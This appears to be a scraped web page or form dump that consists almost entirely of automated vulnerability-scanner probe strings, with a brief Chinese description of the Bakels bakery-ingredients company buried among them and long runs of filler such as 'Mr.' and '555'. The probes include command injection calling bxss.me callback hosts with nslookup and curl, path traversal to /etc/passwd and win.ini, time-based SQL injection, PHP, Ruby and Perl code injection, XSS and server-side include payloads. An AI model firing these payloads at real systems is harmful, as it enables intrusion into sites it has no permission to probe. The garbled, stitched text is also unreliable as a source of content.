;(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)|(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)&(nslookup -q=cname hitcontpqpzap93447.bxss.me||curl hitcontpqpzap93447.bxss.me)

`(nslookup -q=cname hitaivbjzxvsidc455.bxss.me||curl hitaivbjzxvsidc455.bxss.me)`

|(nslookup -q=cname hitpqniwyknuc1c805.bxss.me||curl hitpqniwyknuc1c805.bxss.me)

&(nslookup -q=cname hitjctvtbxree43260.bxss.me||curl hitjctvtbxree43260.bxss.me)&'\"`0&(nslookup -q=cname hitjctvtbxree43260.bxss.me||curl hitjctvtbxree43260.bxss.me)&`'

&nslookup -q=cname hithjtmqmclwoc076a.bxss.me&'\"`0&nslookup -q=cname hithjtmqmclwoc076a.bxss.me&`'

$(nslookup -q=cname hitrsendnydfd9e9cb.bxss.me||curl hitrsendnydfd9e9cb.bxss.me)

WEB-INF\web.xml

(nslookup -q=cname hitaiqgljcczs7f6e8.bxss.me||curl hitaiqgljcczs7f6e8.bxss.me))

WEB-INF/web.xml

|echo ogmstl$()\ nlkjdq\nz^xyu||a #' |echo ogmstl$()\ nlkjdq\nz^xyu||a #|" |echo ogmstl$()\ nlkjdq\nz^xyu||a #

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

&echo voezyd$()\ msubnc\nz^xyu||a #' &echo voezyd$()\ msubnc\nz^xyu||a #|" &echo voezyd$()\ msubnc\nz^xyu||a #

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

echo lcspua$()\ cueipo\nz^xyu||a #' &echo lcspua$()\ cueipo\nz^xyu||a #|" &echo lcspua$()\ cueipo\nz^xyu||a #

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

/../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini%00.jpg

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

C:\WINDOWS\system32\drivers\etc\hosts

file:///etc/passwd

../../../../../../../../../../../../../../windows/win.ini

../../../../../../../../../../../../../../etc/passwd

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

;(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)|(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)&(nslookup -q=cname hitjhrjcfjath84c34.bxss.me||curl hitjhrjcfjath84c34.bxss.me)

`(nslookup -q=cname hiteesrlbeecxeb238.bxss.me||curl hiteesrlbeecxeb238.bxss.me)`

|(nslookup -q=cname hitdokxjpzpeb4ac5c.bxss.me||curl hitdokxjpzpeb4ac5c.bxss.me)

&(nslookup -q=cname hitlqkmpwsyco0ee72.bxss.me||curl hitlqkmpwsyco0ee72.bxss.me)&'\"`0&(nslookup -q=cname hitlqkmpwsyco0ee72.bxss.me||curl hitlqkmpwsyco0ee72.bxss.me)&`'

&nslookup -q=cname hituobjviqiuccc3c3.bxss.me&'\"`0&nslookup -q=cname hituobjviqiuccc3c3.bxss.me&`'

$(nslookup -q=cname hitooqpwajtnk925f0.bxss.me||curl hitooqpwajtnk925f0.bxss.me)

(nslookup -q=cname hitmnvrhcrcvo96792.bxss.me||curl hitmnvrhcrcvo96792.bxss.me))

|echo vaavse$()\ flvwgp\nz^xyu||a #' |echo vaavse$()\ flvwgp\nz^xyu||a #|" |echo vaavse$()\ flvwgp\nz^xyu||a #

&echo hapyvd$()\ ryxhzu\nz^xyu||a #' &echo hapyvd$()\ ryxhzu\nz^xyu||a #|" &echo hapyvd$()\ ryxhzu\nz^xyu||a #

'.print(md5(31337)).'

echo qenlvx$()\ ckirhq\nz^xyu||a #' &echo qenlvx$()\ ckirhq\nz^xyu||a #|" &echo qenlvx$()\ ckirhq\nz^xyu||a #

${@print(md5(31337))}\

${@print(md5(31337))}

1*if(now()=sysdate(),sleep(15),0)

";print(md5(31337));$a="

/../../../../../../../../../../windows/system32/BITSADMIN.exe

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

/../../../../../../../../../../windows/system32/BITSADMIN.exe

dSh9t538

-1" OR 3*2>(0+5+675-675) --

-1" OR 3*2<(0+5+675-675) --

9VKhJDNS

-1" OR 3+675-675-1=0+0+0+1 --

-1" OR 2+675-675-1=0+0+0+1 --

-1' OR 3*2>(0+5+522-522) or 'YikRs8Xy'='

'.print(md5(31337)).'

&n904694=v968252

${@print(md5(31337))}\

-1' OR 3*2<(0+5+522-522) or 'YikRs8Xy'='

${@print(md5(31337))}

-1' OR 3+522-522-1=0+0+0+1 or 'YikRs8Xy'='

";print(md5(31337));$a="

-1' OR 2+522-522-1=0+0+0+1 or 'YikRs8Xy'='

&n943450=v998144

';print(md5(31337));$a='

-1' OR 3*2>(0+5+121-121) --

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

-1' OR 3*2<(0+5+121-121) --

-1' OR 3+121-121-1=0+0+0+1 --

-1' OR 2+121-121-1=0+0+0+1 --

-1 OR 3*2>(0+5+861-861)

-1 OR 3*2<(0+5+861-861)

-1 OR 3+861-861-1=0+0+0+1

".gethostbyname(lc("hitqx"."hiuvbjuc5983d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(74).chr(108).chr(74)."

-1 OR 2+861-861-1=0+0+0+1

'.gethostbyname(lc('hitpv'.'ogpbbemm536f8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(73).chr(109).chr(82).'

-1 OR 3*2>(0+5+320-320) --

-1 OR 3*2<(0+5+320-320) --

-1 OR 3+320-320-1=0+0+0+1 --

-1 OR 2+320-320-1=0+0+0+1 --

".gethostbyname(lc("hitkn"."boftnthj2785e.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(74).chr(117).chr(65)."

'.gethostbyname(lc('hitfe'.'tgmzsbwx71712.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(86).chr(111).chr(66).'

"||sleep(27*1000)*kvyqaf||"

'||sleep(27*1000)*taubpo||'

"&&sleep(27*1000)*hqkwst&&"

'&&sleep(27*1000)*gjjjqs&&'

'"()

^(#$!@#$)(()))******

!(()&&!|*|*|

)

"||sleep(271000)ypoazg||"

'||sleep(271000)akgfqj||'

"&&sleep(271000)rcpsuz&&"

'&&sleep(271000)himsvl&&'

^(#$!@#$)(()))******

'"()

1VrYHroiO

!(()&&!|||

1CPl6DPGO

bxss.me

555

/etc/shells

555

http://bxss.me/t/fit.txt%3F.

555

Mr.

555

Http://bxss.me/t/fit.txt

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

./Mr.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

../Mr.

555

Mr.

555

Mr.

555

Mr.

555

file:///etc/passwd

555

Mr.

555

../../../../../../../../../../../../../../windows/win.ini

555

Mr.

555

../../../../../../../../../../../../../../etc/passwd

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

bxss.me

Mr.

555

Mr.

555

Mr.

c:/windows/win.ini

Mr.

/etc/shells

Mr.

./555

Mr.

http://bxss.me/t/fit.txt%3F.jpg

Mr.

../555

Mr.

Http://bxss.me/t/fit.txt

'+'A'.concat(70-3).concat(22*4).concat(99).concat(80).concat(116).concat(85)+(require'socket'

555

Mr.

555

Mr.

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

"+"A".concat(70-3).concat(22*4).concat(120).concat(66).concat(122).concat(89)+(require"socket"

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

file:///etc/passwd

Mr.

555

Mr.

555

Mr.

555

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

'+'A'.concat(70-3).concat(22*4).concat(110).concat(69).concat(97).concat(81)+(require'socket'

Socket.gethostbyname('hitiz'+'zwgjybbx6d227.bxss.me.')[3].to_s)+'

Mr.

555

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

"+"A".concat(70-3).concat(22*4).concat(104).concat(81).concat(118).concat(67)+(require"socket"

Socket.gethostbyname("hitsb"+"jicemfeybf7a2.bxss.me.")[3].to_s)+"

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

Mr.

555

${@print(md5(31337))}\

555

Mr.

555

${@print(md5(31337))}

555

Mr.

555

Mr.

555

Mr.

555

";print(md5(31337));$a="

555

Mr.

555

Mr.

555

Mr.

555

';print(md5(31337));$a='

555

Mr.

555

Mr.

555

Mr.

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'.print(md5(31337)).'

Mr.

555

Mr.

555

Mr.

555

Mr.

${@print(md5(31337))}\

Mr.

555

Mr.

${@print(md5(31337))}

Mr.

555

Mr.

555

Mr.

";print(md5(31337));$a="

Mr.

';print(md5(31337));$a='

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitde"."gedmcxylddfe6.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(86).chr(121).chr(74)."

555

Mr.

555

'.gethostbyname(lc('hithy'.'ipdygdynd3a8e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(82).chr(109).chr(79).'

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

".gethostbyname(lc("hitvu"."uivmlmoa1bc9d.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(66).chr(103).chr(81)."

Mr.

'.gethostbyname(lc('hitzm'.'xayhxfwl1bd84.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(104).chr(71).'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

bxss.me

555

c:/windows/win.ini

555

/etc/shells

555

http://bxss.me/t/fit.txt%3F.

555

Http://bxss.me/t/fit.txt

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

'+'A'.concat(70-3).concat(22*4).concat(116).concat(67).concat(104).concat(73)+(require'socket'

555

Mr.

555

Mr.

555

"+"A".concat(70-3).concat(22*4).concat(104).concat(90).concat(98).concat(84)+(require"socket"

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(102).concat(81).concat(107).concat(71)+(require'socket'

Socket.gethostbyname('hitln'+'lbtidtca92e95.bxss.me.')[3].to_s)+'

Mr.

bxss.me

Mr.

c:/windows/win.ini

Mr.

"+"A".concat(70-3).concat(22*4).concat(115).concat(84).concat(98).concat(71)+(require"socket"

Socket.gethostbyname("hitcj"+"pqwzpjfu0250b.bxss.me.")[3].to_s)+"

./Mr.

555

Mr.

555

../Mr.

555

Mr.

/etc/shells

Mr.

555

Mr.

555

Mr.

http://bxss.me/t/fit.txt%3F.jpg

Mr.

555

file:///etc/passwd

555

Mr.

555

Mr.

Http://bxss.me/t/fit.txt

../../../../../../../../../../../../../../windows/win.ini

555

Mr.

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

../../../../../../../../../../../../../../etc/passwd

555

Mr.

555

Mr.

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

./555

Mr.

555

Mr.

../555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

file:///etc/passwd

Mr.

555

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

Mr.

555

${@print(md5(31337))}\

555

Mr.

555

Mr.

555

${@print(md5(31337))}

555

Mr.

555

Mr.

555

";print(md5(31337));$a="

555

Mr.

555

Mr.

555

';print(md5(31337));$a='

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'.print(md5(31337)).'

Mr.

555

Mr.

555

Mr.

${@print(md5(31337))}\

Mr.

555

Mr.

${@print(md5(31337))}

Mr.

555

Mr.

555

Mr.

";print(md5(31337));$a="

Mr.

';print(md5(31337));$a='

Mr.

555

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitjz"."vhjpmdpva7dfc.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(81).chr(116).chr(90)."

555

'.gethostbyname(lc('hitnz'.'cjoovzqha89cd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(68).chr(106).chr(84).'

555

Mr.

555

Mr.

555

Mr.

".gethostbyname(lc("hiteq"."hbqgyimna05ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(81).chr(109).chr(66)."

Mr.

'.gethostbyname(lc('hitty'.'paefryhm633b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(77).chr(111).chr(87).'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Bernard-bakels 碧琪集團的名字來源於荷蘭商人 Bakels 兄弟于1904年在荷蘭阿姆斯特丹註冊的碧琪公司。其中的一個兄弟 Bernard J. Bakels 使碧琪聲名遠揚。

今天的碧琪集團是一個名符其實的全球性公司，在全球各地都有生產廠家和精挑細選的代理商。碧琪公司的產品在120多個國家都有銷售，供烘焙食品行使用。

Mr.

555

Mr.

555

Mr.

555

Welcome

@@7YZUK

����%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1P2Hj5Weo')) OR 456=(SELECT 456 FROM PG_SLEEP(15))--

1zdDPfNW2') OR 813=(SELECT 813 FROM PG_SLEEP(15))--

1LiQdVr8j' OR 899=(SELECT 899 FROM PG_SLEEP(15))--

1-1)) OR 645=(SELECT 645 FROM PG_SLEEP(15))--

1-1) OR 114=(SELECT 114 FROM PG_SLEEP(15))--

1-1 OR 356=(SELECT 356 FROM PG_SLEEP(15))--

1ahvE6T50')); waitfor delay '0:0:15' --

1ny1DxZHX'); waitfor delay '0:0:15' --

1Cr3rV865'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

/\xfs.bxss.me?hkbakels.com.hk

//xfs.bxss.me?hkbakels.com.hk

-1" OR 3*2>(0+5+237-237) --

-1" OR 3*2<(0+5+237-237) --

-1" OR 3+237-237-1=0+0+0+1 --

WEB-INF\web.xml

19422990

-1" OR 2+237-237-1=0+0+0+1 --

-1' OR 3+453-453-1=0+0+0+1 or '4wgpsg8o'='

WEB-INF/web.xml

-1' OR 2+453-453-1=0+0+0+1 or '4wgpsg8o'='

'"()&%<zzz><InvalidTag >zl5U(9681)</ScRiPt>

xfs.bxss.me?hkbakels.com.hk

1'"()&%<zzz><InvalidTag >zl5U(9186)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1' OR 3*2>(0+5+733-733) --

-1' OR 3*2<(0+5+733-733) --

<!--

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://xfs.bxss.me?hkbakels.com.hk

-1' OR 3+733-733-1=0+0+0+1 --

'"

-1' OR 2+733-733-1=0+0+0+1 --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

-1 OR 3+797-797-1=0+0+0+1

960526

..\..\..\..\..\..\..\..\windows\win.ini

-1 OR 2+797-797-1=0+0+0+1

xfs.bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1 OR 3*2>(0+5+937-937) --

-1 OR 3*2<(0+5+937-937) --

bxss.me/t/xss.html?%00

bxss.me

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

HttP://bxss.me/t/xss.html?%00

'+'A'.concat(70-3).concat(22*4).concat(121).concat(78).concat(114).concat(67)+(require'socket'

/../../../../../../../../../../boot.ini

c:/windows/win.ini

"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(109).concat(82)+(require"socket"

/etc/shells

-1 OR 3+937-937-1=0+0+0+1 --

../../../../../../../../../../windows/win.ini%00.jpg

http://bxss.me/t/fit.txt%3F.jpg

"+response.write(9282433*9571588)+"

C:\WINDOWS\system32\drivers\etc\hosts

'+response.write(9282433*9571588)+'

Http://bxss.me/t/fit.txt

-1 OR 2+937-937-1=0+0+0+1 --

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

response.write(9282433*9571588)

file:///etc/passwd

${9999825+9999789}

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

��%2527%2522\'\"

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

"||sleep(271000)doaeey||"

'||sleep(271000)fgswdt||'

"&&sleep(271000)gcvgbk&&"

'&&sleep(271000)propun&&'

!(()&&!|||